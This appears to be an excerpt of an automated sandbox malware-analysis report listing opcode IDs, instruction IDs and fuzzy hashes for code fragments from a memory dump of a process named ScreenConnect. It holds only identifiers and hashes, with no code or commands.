                                                                                                                                                                                                                                                    • Opcode ID: 51e55ce9ab6616f5c8eff153a4bafbb750d5620242344111b068e1f6f41056d6
                                                                                                                                                                                                                                                    • Instruction ID: 5c640a75aa7bb63db056c03b7fa0908b7f35c7805b6d5475951d712271312ddd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e55ce9ab6616f5c8eff153a4bafbb750d5620242344111b068e1f6f41056d6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC315330A0D98E8FDB94EF18C4509BA77A1FF59354B5406A9D42DC72C2CB35EC52CB81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 365bbce5bd35f3df4a366eb42f7fefcec64fb6490282b1ff0fe66cf399652e87
                                                                                                                                                                                                                                                    • Instruction ID: 27cb256692f3c3dd8d7959b06cce821d624388c68c18b4934a714a8430f17775
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 365bbce5bd35f3df4a366eb42f7fefcec64fb6490282b1ff0fe66cf399652e87
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7031F833E0CAE94FFBA6AB6858211E83BB0FF55354F0600A7E56CD7192DE29D8108342
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0701ba7e28fba0e0ac8ef449067f6c8abf63cb3d000563c1b677e11ae54ced9f
                                                                                                                                                                                                                                                    • Instruction ID: 76c5d086dc09c54a9a232a01b999fb8afd78a0ee3ef077cb54504d98643f1469
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0701ba7e28fba0e0ac8ef449067f6c8abf63cb3d000563c1b677e11ae54ced9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4731B132E0D9A98FFB65BE29A8511E97BA1FF98344F040179E06CC31D2DF28A806C745
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6a0cdb49730904d54b021fa77cd2728465a35d1f08039d96f70c4a01daa8e288
                                                                                                                                                                                                                                                    • Instruction ID: 2292f68c6d206f398b93dacccbd5c4c83906f25d9e85a08ac2f54d687a997c18
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0cdb49730904d54b021fa77cd2728465a35d1f08039d96f70c4a01daa8e288
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9310A30A4995E8FEBD8EF18D451ABA73E2FF68354B500569D42DC7285CB35EC52CB80
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bd6c40e57ea36716aae686e56812c419316720b8f3883fd203944adaf97c2547
                                                                                                                                                                                                                                                    • Instruction ID: f4997c650ac1d8bccab448377a930e8ba2fc51e2eefc0b76b729a1ee058969a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd6c40e57ea36716aae686e56812c419316720b8f3883fd203944adaf97c2547
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB21063180EAD94FE766AB3498111A67BE1FF95360B0402BAD099C7592DB2CA846C351
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f20553a96c55dccd14f858a5682f34ad0c3145b763eef150b1b4b541896a9921
                                                                                                                                                                                                                                                    • Instruction ID: eb6d4d8c128e0d1cc2bc2d7e8df89aa9ce71163611c4cd9887bf8ca6229cbf01
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f20553a96c55dccd14f858a5682f34ad0c3145b763eef150b1b4b541896a9921
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2611A272D0CADA8FEBA5EF6498664B87FE0FF56304F1550AAD068C3292DA74A900C701
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4b10468927861fc58818b8b33aeac5fe3644847d07b8844cbbda3ee012c8733b
                                                                                                                                                                                                                                                    • Instruction ID: 31e66e41355bfe08363084c4029d6604735b7f14ac828c17954279335400f239
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b10468927861fc58818b8b33aeac5fe3644847d07b8844cbbda3ee012c8733b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49119070A0C95A8FEB99EF288050B6577E1FF54344F1444B8C42ECB287CE29E84AC780
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f006a779c03ab86e3fe56147b40c9c03cd826adadc8230eaf8b2eb18c5f4234a
                                                                                                                                                                                                                                                    • Instruction ID: 99ada042f8e4e39dfd7372d899e5245b78842b2016c24a73c3c2a0025b07c379
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f006a779c03ab86e3fe56147b40c9c03cd826adadc8230eaf8b2eb18c5f4234a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C11E02490DAE70EF779A72954602746AE1EF81280F1981BAC469C61D2DD2C9C89C301
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 620de0ddacca7d8ff308c2cbb5e82a5ef50c3685b25b362b18aa45d6cb839f5c
                                                                                                                                                                                                                                                    • Instruction ID: 72b9d94dd7b52eeee86197c62cb5936fe2edfcaf69ff75c6166ac46e74c07a23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 620de0ddacca7d8ff308c2cbb5e82a5ef50c3685b25b362b18aa45d6cb839f5c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83119470A1C94A4FEB99EF28C451B6577E1FF54744F0444B8C46DCB287DE29E849C780
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c5fa20c7930078b5cd9bfca259f8a4dbd3074e51c3feab492086f01c4575227c
                                                                                                                                                                                                                                                    • Instruction ID: 70479a36e0a3bf44fce19f37c07788231fbc1a47eb582bdb5212a0b884b1ff50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5fa20c7930078b5cd9bfca259f8a4dbd3074e51c3feab492086f01c4575227c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0303540D6DC5FCB52EB64D4558D67FB0EF16311B0501C7E059CB052D7619A59CB82
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f9a34cbd2f8670be270df6b3b01e87cf37e2671066ba109eea8679aab049ede3
                                                                                                                                                                                                                                                    • Instruction ID: d47bccf9291c717e68e18e9a570fc2c7f18902dbba00e32e1c1cb01fe4f54e5e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9a34cbd2f8670be270df6b3b01e87cf37e2671066ba109eea8679aab049ede3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE06D6110E3D40FD7569B3484A88E57F609D1321431940EBD4858F0A3E5158989C752
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f95d4284f50e2f9fb7c11800f3cf52e4d157def6f120d6c4a0d2049857c5d4f1
                                                                                                                                                                                                                                                    • Instruction ID: 2dede87515e823203469f4a51e25ae53619c9064d4a353977c06c0b262aaab56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f95d4284f50e2f9fb7c11800f3cf52e4d157def6f120d6c4a0d2049857c5d4f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49E0C225D4DA270AFB7C3A3574913B560D08F44391F0940BA983DC00D5DE6C9CC5C551
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7c3a9d049ff25b08266e7921892b498fedb2ab1cf8801e6fd39512a5118f2919
                                                                                                                                                                                                                                                    • Instruction ID: fab3af01954616d8672ae314d8a4bb1b3513fe47a8bd5e153af8ecaedb7c1b27
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c3a9d049ff25b08266e7921892b498fedb2ab1cf8801e6fd39512a5118f2919
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FD09E12F6CCAA0EA5E4F57C24562B902C6E7A8AD0B9410B6D56CC728ADD0D5D8603C1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 009ba7627cd08e8f5e27f9d9074874e92b5eccc3bcbde701a23e554ae68d7338
                                                                                                                                                                                                                                                    • Instruction ID: 7b821aa32bb9f26bf9ce0eb8ba91ea5bb5a034a924b4bbc9c7940d016042a0e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 009ba7627cd08e8f5e27f9d9074874e92b5eccc3bcbde701a23e554ae68d7338
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70C09B24E1C5564EF155FF24444117D11526FCC340F514435E41D851C7CE3C7D115549
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 81643db2a04e7e88cbb3582a1e946b501e792ddec3d1a8225f972c8b9467ec06
                                                                                                                                                                                                                                                    • Instruction ID: dd2cf3cfe9f42d599276eb752827a4f6b475d6a5e4a0700233f0daf7ae93c64e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81643db2a04e7e88cbb3582a1e946b501e792ddec3d1a8225f972c8b9467ec06
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20A00210E0D9664DF075BA14000117D00414F94780F214535E42E851CBDE5D6D96519A